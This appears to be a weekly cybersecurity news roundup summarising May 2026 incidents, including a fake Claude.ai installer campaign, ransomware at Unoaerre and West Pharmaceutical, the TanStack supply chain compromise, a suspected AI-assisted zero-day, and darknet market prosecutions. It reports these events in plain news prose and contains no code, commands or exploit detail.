Cybersecurity News Roundup: Cybercrime Shifts Toward Faster Supply Chain Attacks, Silent Extortion, and Real-World Consequences
Published
The week’s incidents show cybercrime becoming faster and quieter, with supply chain attacks targeting developer ecosystems because compromising one package can spread malware to thousands of organizations. Ransomware groups are shifting tactics because encryption does not guarantee payments.
Google researchers said they identified what may be the first suspected AI-assisted zero-day exploit before it reached large-scale exploitation.
Fake Claude.ai Chats in Google Ads Campaign Infect Macs
Attackers are abusing Google Ads and Claude.ai shared chats to distribute malware targeting macOS users searching for Claude installation tools. Sponsored search results reportedly display claude.ai as the destination, making the malicious setup pages appear legitimate. The campaign uses fake installation guides that instruct users to open the macOS Terminal and execute copied shell commands. The scripts collected system information, including IP address, hostname, operating system version, and keyboard settings, before deploying additional payloads.
Unoaerre Rejects €3.8M Ransom After Cyberattack Forces Factory Evacuation
Italian jewelry manufacturer Unoaerre refused to pay a €3.8 million bitcoin ransom after a ransomware attack disrupted operations at its manufacturing facility on May 10, 2026. The incident reportedly unfolded while the company was preparing for the OroArezzo trade fair and its 100th-anniversary exhibition. Employees were instructed to leave the plant after software systems became unresponsive and internal teams detected abnormal network activity. IT specialists isolated affected infrastructure to contain the intrusion.
West Pharmaceutical Hit By Cyberattack, Worldwide Operations Disrupted
West Pharmaceutical Services disclosed a material cyberattack after detecting an intrusion on May 4. The company said attackers exfiltrated data and encrypted systems, prompting global shutdowns and operational disruptions. West notified law enforcement and hired Palo Alto Networks’ Unit 42 to assist with investigation and recovery efforts. The company said manufacturing and shipping processes have restarted at some sites, while full restoration remains ongoing. West added that it is still investigating the scope of the incident, including the extent of affected data and potential financial impact.
Google Detects First Suspected AI-Developed Zero-Day Exploit
Google Threat Intelligence Group said it identified what may be the first known zero-day exploit developed with AI assistance. The exploit was written in Python and targeted a widely used open-source, web-based administration tool. Google said the flaw could have allowed attackers to bypass two-factor authentication through a logic issue tied to a hardcoded trust assumption. The planned campaign was disrupted before it could become a mass exploitation event. The report also covered broader AI use by threat actors, including malware automation, vulnerability research, and fake media operations. Google said it does not believe Gemini was used to develop this exploit.
Hackers Exploit Critical cPanel Flaw to Steal Credentials and Hijack Servers
Researchers at QiAnXin XLab said threat actors linked to the Mr_Rot13 group are actively exploiting CVE-2026-41940, a critical cPanel and WHM vulnerability with a CVSS score of 9.8. The flaw allows authentication bypass and full administrative control. XLab said more than 2,000 attacking IP addresses have already been observed globally since the public disclosure of the vulnerability in late April. The attackers reportedly deploy a Go-based loader. The malware steals bash histories, SSH records, database passwords, and device information before transmitting the data to attacker-controlled infrastructure and Telegram channels.
Ransomware Groups Now Prioritize Extortion Over Encryption as Payments Decline
Ransomware groups are shifting away from traditional file encryption attacks and focusing instead on data theft and extortion-based operations, according to new threat intelligence research. Researchers said declining ransom payment rates are pushing cybercriminals to rely more heavily on stolen credentials, public leak threats, and access brokerage services rather than disruptive encryption campaigns. The report also highlighted growing use of EDR killers, Bring Your Own Vulnerable Driver (BYOVD) techniques, and post-quantum cryptography in modern ransomware operations.
Congress Investigates Canvas Breach After Instructure Reaches Deal With ShinyHunters
Instructure confirmed it paid a ransom to the ShinyHunters cybercrime group after attackers stole data linked to the Canvas learning platform used by schools and universities across the U.S. The agreement included the return of stolen files and digital confirmation that the data had been deleted, though such claims from cybercriminals cannot be independently verified. The breach reportedly exposed names, email addresses, student IDs, and messages exchanged between students and professors. Canvas was temporarily taken offline. The House Homeland Security Committee has now requested a formal security briefing from Instructure.
Authorities Arrest Alleged Dream Market Mastermind Over Crypto-to-Gold Laundering
A German national accused of secretly running the now-defunct darknet marketplace Dream Market has been indicted in the U.S. on multiple money laundering charges. Prosecutors allege Owe Martin Andresen, 49, moved more than $2 million in cryptocurrency tied to illegal marketplace commissions between 2023 and 2025, later converting part of the proceeds into physical gold bars shipped to addresses in Germany. Investigators said the wallet activity could only have been performed by someone holding Dream Market’s original private keys, linking Andresen to the long-unidentified administrator known as “Speedstepper.” Authorities seized gold bars, cash, and cryptocurrency holdings.
Mistral AI Says No Internal Breach Found After TeamPCP Leak Claims
Threat actor TeamPCP has claimed responsibility for a supposed breach of French AI company Mistral AI, alleging it stole around 5 GB of internal data spanning roughly 450 repositories. The group claims the data includes AI model training systems, fine-tuning projects, benchmarking assets, inference infrastructure, experiments, and future development work, and is attempting to sell the cache for $25,000. Mistral AI has not confirmed any compromise of its internal systems and instead disclosed that it was impacted by the wider TanStack supply chain attack involving malicious NPM and PyPI packages.
OpenAI Says User Data Safe After TanStack Supply-Chain Attack
OpenAI stated that a recent supply-chain compromise involving malicious TanStack npm packages did not result in the exposure of user data, production systems, or company intellectual property. The company confirmed that two employee devices inside its corporate environment were affected after attackers distributed poisoned versions of the widely used open-source library earlier this week. Investigators found that limited credential material tied to specific code repositories was exfiltrated, but OpenAI said there is no evidence that broader systems, models, or software deployments were compromised.
Mass Supply Chain Attack Compromised Hundreds of npm and PyPI Packages
Researchers uncovered a large software supply chain attack affecting widely used npm and PyPI packages linked to TanStack, Mistral AI, UiPath, and OpenSearch. Investigators said attackers published hundreds of malicious package versions designed to steal developer credentials and compromise CI/CD environments. The campaign reportedly used poisoned updates and automated propagation methods to spread malware across developer ecosystems within hours. The malware targeted GitHub tokens, cloud credentials, and publishing infrastructure, potentially enabling further package hijacking attacks. Researchers described the incident as one of the largest coordinated package ecosystem compromises seen this year.
Kingdom Market Administrator Sentenced Over Dark Web Drug Marketplace
A Slovakian man received a prison sentence for helping operate the Kingdom Market dark web platform. Alan Bill admitted to supporting the marketplace between 2021 and 2023 through administrative and promotional work. Investigators said the platform sold illegal drugs, fake documents, stolen financial data, and malware. German authorities seized the platform’s servers during a multinational operation after Bill’s arrest in New Jersey in December 2023. Prosecutors said evidence linked him to thousands of drug sales, including fentanyl-laced substances, while the court identified him as a major operator within the marketplace.
PraisonAI Vulnerability Faced Exploitation Attempts Within Hours of Disclosure
Security researchers observed attackers probing a newly disclosed PraisonAI vulnerability within four hours of public disclosure. The flaw, tracked as CVE-2026-44338, affected legacy API server configurations with authentication disabled by default. Researchers said exposed systems allowed unauthenticated users to access agent workflows and trigger automated actions remotely. The issue impacted PraisonAI versions 2.5.6 through 4.6.33 before developers released fixes in version 4.6.34. Investigators warned the rapid scanning activity reflects a growing trend where threat actors weaponize disclosed vulnerabilities immediately.
Attackers Used Steganography To Deliver PureLogs Malware Through PAWSRunner
Fortinet researchers uncovered a malware campaign using steganography to hide PureLogs payloads inside image files. The operation used a delivery tool called PAWSRunner to retrieve and execute hidden malware components in memory. Researchers said the campaign relied on multi-stage execution techniques designed to avoid antivirus detection and forensic analysis. PureLogs is an information-stealing malware family targeting browser data, credentials, cryptocurrency wallets, and application information. The findings highlight how threat actors increasingly combine fileless execution and concealed payload delivery to bypass traditional security defenses.
Cybercrime’s Expanding Playbook
AI systems are now both targets and operational tools in cybercrime. Threat actors exploited newly disclosed AI-related flaws, while researchers warned that AI-assisted exploit development is emerging.
Cyberattacks spilled into public institutions with the Canvas breach exposing educational data, triggering negotiations with cybercriminals, and drawing congressional attention.
Stronger international coordination between governments, researchers, and law enforcement agencies continued investigations and defense operations across borders.
Related
Get expert insights on threats, breaches, scams, and security trends — delivered every Monday.
Most Popular
Get expert insights on threats, breaches, scams, and security trends — delivered every Monday.
Most Popular